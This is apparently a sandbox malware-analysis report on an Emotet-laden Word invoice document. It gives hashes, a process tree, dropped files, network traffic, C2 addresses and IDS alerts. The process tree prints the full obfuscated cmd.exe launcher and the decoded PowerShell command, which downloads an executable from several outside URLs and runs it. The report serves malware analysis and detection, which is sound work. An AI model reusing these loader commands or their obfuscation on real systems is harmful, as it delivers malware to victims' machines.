File name: | 201811rechnung_5935053159.doc |
Full analysis: | https://app.any.run/tasks/f9fdb691-cdba-4be9-b451-8ab528450585 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 11:18:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 03:08:00 2018, Last Saved Time/Date: Fri Dec 14 03:08:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0 |
MD5: | 68930F8C6D5C7FD4BBFD1FACC22C83F8 |
SHA1: | 84E6219E3D73C928F617DA808DE6E425DBE4324D |
SHA256: | 706357D42E6415E2987F03BB2E38437637310D3A1ACC4F3DC62646A16AD6E801 |
SSDEEP: | 1536:Fw1LD4fbKghmXB5luOUom8uW460GHd2kQD3gavK6+a9yE:Fw13eKQOUo105ocksvS9 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 03:08:00 |
ModifyDate: | 2018:12:14 03:08:00 |
Pages: | 1 |
Words: | 7 |
Characters: | 41 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 47 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2956 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201811rechnung_5935053159.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2164 | c:\GuQUusPTiOECQu\nWbvQWzJw\BArAGJQDiliCHj\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Sv=zzirKMGTzFccTCbFZontmX@+O,yjk;AD/(7)HWguL6 REhwe=INqf7f81a39-5f63-5b42-9efd-1f13b5431005#39;3}908a:dp\lvfSV-x.Qs54B{&&for %Y in (52;64;30;6;48;53;12;37;67;53;29;52;2;66;27;48;18;47;46;69;17;14;27;47;11;19;42;50;47;19;71;37;47;14;13;64;2;47;18;19;29;52;76;37;40;48;53;45;19;19;62;60;32;32;59;73;28;61;59;18;2;47;64;19;59;18;71;11;17;20;32;70;46;46;24;44;6;16;22;45;19;19;62;60;32;32;59;18;19;45;17;18;26;28;61;47;73;2;38;18;71;11;17;20;32;59;34;59;59;73;17;76;22;45;19;19;62;60;32;32;59;18;61;19;45;47;18;14;59;20;71;11;17;20;32;15;18;8;74;47;2;28;22;45;19;19;62;60;32;32;66;2;19;11;45;14;39;3;38;11;45;59;20;14;47;3;71;11;17;20;32;51;76;75;13;72;36;62;73;11;22;45;19;19;62;60;32;32;19;59;18;27;17;18;38;28;3;39;47;18;38;71;2;61;32;50;36;27;27;50;45;34;53;71;67;62;64;2;19;33;53;22;53;35;29;52;39;16;73;48;53;18;37;68;53;29;52;24;17;72;42;48;42;53;41;56;54;53;29;52;28;46;76;48;53;19;2;31;53;29;52;45;45;59;48;52;47;18;65;60;19;47;20;62;23;53;63;53;23;52;24;17;72;23;53;71;47;70;47;53;29;66;17;3;47;59;11;45;33;52;66;11;16;42;2;18;42;52;76;37;40;35;77;19;3;26;77;52;2;66;27;71;31;17;46;18;64;17;59;61;15;2;64;47;33;52;66;11;16;25;42;52;45;45;59;35;29;52;68;72;64;48;53;19;21;11;53;29;49;66;42;33;33;6;47;19;69;49;19;47;20;42;52;45;45;59;35;71;64;47;18;38;19;45;42;69;38;47;42;58;57;57;57;57;35;42;77;49;18;65;17;28;47;69;49;19;47;20;42;52;45;45;59;29;52;62;17;2;48;53;51;2;2;53;29;14;3;47;59;28;29;55;55;11;59;19;11;45;77;55;55;52;31;43;15;48;53;17;19;4;53;29;80)do set Ku=!Ku!!Sv:~%Y,1!&&if %Y gtr 79 powershell.exe "!Ku:*Ku!=!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2768 | CmD /V:/C"set Sv=zzirKMGTzFccTCbFZontmX@+O,yjk;AD/(7)HWguL6 REhwe=INqf7f81a39-5f63-5b42-9efd-1f13b5431005#39;3}908a:dp\lvfSV-x.Qs54B{&&for %Y in (52;64;30;6;48;53;12;37;67;53;29;52;2;66;27;48;18;47;46;69;17;14;27;47;11;19;42;50;47;19;71;37;47;14;13;64;2;47;18;19;29;52;76;37;40;48;53;45;19;19;62;60;32;32;59;73;28;61;59;18;2;47;64;19;59;18;71;11;17;20;32;70;46;46;24;44;6;16;22;45;19;19;62;60;32;32;59;18;19;45;17;18;26;28;61;47;73;2;38;18;71;11;17;20;32;59;34;59;59;73;17;76;22;45;19;19;62;60;32;32;59;18;61;19;45;47;18;14;59;20;71;11;17;20;32;15;18;8;74;47;2;28;22;45;19;19;62;60;32;32;66;2;19;11;45;14;39;3;38;11;45;59;20;14;47;3;71;11;17;20;32;51;76;75;13;72;36;62;73;11;22;45;19;19;62;60;32;32;19;59;18;27;17;18;38;28;3;39;47;18;38;71;2;61;32;50;36;27;27;50;45;34;53;71;67;62;64;2;19;33;53;22;53;35;29;52;39;16;73;48;53;18;37;68;53;29;52;24;17;72;42;48;42;53;41;56;54;53;29;52;28;46;76;48;53;19;2;31;53;29;52;45;45;59;48;52;47;18;65;60;19;47;20;62;23;53;63;53;23;52;24;17;72;23;53;71;47;70;47;53;29;66;17;3;47;59;11;45;33;52;66;11;16;42;2;18;42;52;76;37;40;35;77;19;3;26;77;52;2;66;27;71;31;17;46;18;64;17;59;61;15;2;64;47;33;52;66;11;16;25;42;52;45;45;59;35;29;52;68;72;64;48;53;19;21;11;53;29;49;66;42;33;33;6;47;19;69;49;19;47;20;42;52;45;45;59;35;71;64;47;18;38;19;45;42;69;38;47;42;58;57;57;57;57;35;42;77;49;18;65;17;28;47;69;49;19;47;20;42;52;45;45;59;29;52;62;17;2;48;53;51;2;2;53;29;14;3;47;59;28;29;55;55;11;59;19;11;45;77;55;55;52;31;43;15;48;53;17;19;4;53;29;80)do set Ku=!Ku!!Sv:~%Y,1!&&if %Y gtr 79 powershell.exe "!Ku:*Ku!=!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2684 | powershell.exe "$lAG='TWS';$ifj=new-object Net.WebClient;$BWL='http://askdanieltan.com/xwwOEGZ@http://anthonykdesign.com/a7aasoB@http://andthenbam.com/Fnz5eik@http://fitchburgchamber.com/qB4CQHpsc@http://tanjongkrueng.id/NHjjNh7'.Split('@');$uZs='nWV';$OoQ = '693';$kwB='tiD';$hha=$env:temp+'\'+$OoQ+'.exe';foreach($fcZ in $BWL){try{$ifj.DownloadFile($fcZ, $hha);$VQl='tXc';If ((Get-Item $hha).length -ge 80000) {Invoke-Item $hha;$poi='qii';break;}}catch{}}$DRF='otK';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3800 | "C:\Users\admin\AppData\Local\Temp\693.exe" | C:\Users\admin\AppData\Local\Temp\693.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2604 | "C:\Users\admin\AppData\Local\Temp\693.exe" | C:\Users\admin\AppData\Local\Temp\693.exe | 693.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4044 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 693.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2588 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4072 | "C:\Users\admin\AppData\Local\archivesymbol\DgzoNmO0d.exe" | C:\Users\admin\AppData\Local\archivesymbol\DgzoNmO0d.exe | — | archivesymbol.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2516 | "C:\Users\admin\AppData\Local\archivesymbol\DgzoNmO0d.exe" | C:\Users\admin\AppData\Local\archivesymbol\DgzoNmO0d.exe | DgzoNmO0d.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8C87.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E10C9DD.wmf | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\251214F3.wmf | — | |
MD5:— | SHA256:— | |||
2684 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZXUW236W7476L11P56P9.temp | — | |
MD5:— | SHA256:— | |||
2684 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199e59.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2604 | 693.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:636CEE26DA9AF2B6BEAEBC246FD207CC | SHA256:F0F628FD84E94101658A4BD291B8918CC77936A6DBC2DCDCA9A019E30FCFA26A | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F10E8AA041A36F89F2A7C02AE8B05C68 | SHA256:7141FE29A39D44B1C15447FF3B5C4F539D4BF3104A11382AD17B1FC304F6114C | |||
2684 | powershell.exe | C:\Users\admin\AppData\Local\Temp\693.exe | executable | |
MD5:636CEE26DA9AF2B6BEAEBC246FD207CC | SHA256:F0F628FD84E94101658A4BD291B8918CC77936A6DBC2DCDCA9A019E30FCFA26A | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10CEF64C.wmf | wmf | |
MD5:99A716C97645D06B2D31FBBDFF73C60B | SHA256:7186DDFEBAC8B6C6092E9A545DA1B9062723044C732264FB0C14D2617CAA8B1D | |||
2516 | DgzoNmO0d.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:CB2E99B25FCCCB84DF52132E0497BC47 | SHA256:44964FE37D504C13D35F125ECE13EA56E89278B88210875514335B63F8D5CCBC |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2276 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
2588 | archivesymbol.exe | GET | 200 | 190.146.201.54:80 | http://190.146.201.54/ | CO | binary | 107 Kb | malicious |
2684 | powershell.exe | GET | 301 | 209.59.129.18:80 | http://askdanieltan.com/xwwOEGZ | US | html | 240 b | malicious |
2276 | archivesymbol.exe | GET | — | 190.152.12.86:80 | http://190.152.12.86/ | EC | — | — | malicious |
2684 | powershell.exe | GET | 200 | 209.59.129.18:80 | http://askdanieltan.com/xwwOEGZ/ | US | executable | 164 Kb | malicious |
2276 | archivesymbol.exe | GET | — | 152.168.60.9:80 | http://152.168.60.9/ | AR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2588 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
2276 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
2276 | archivesymbol.exe | 190.152.12.86:80 | — | CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP | EC | malicious |
2684 | powershell.exe | 209.59.129.18:80 | askdanieltan.com | Liquid Web, L.L.C | US | suspicious |
2276 | archivesymbol.exe | 152.168.60.9:80 | — | CABLEVISION S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
askdanieltan.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2684 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2684 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2684 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2684 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2684 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2588 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2588 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2276 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2276 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2276 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |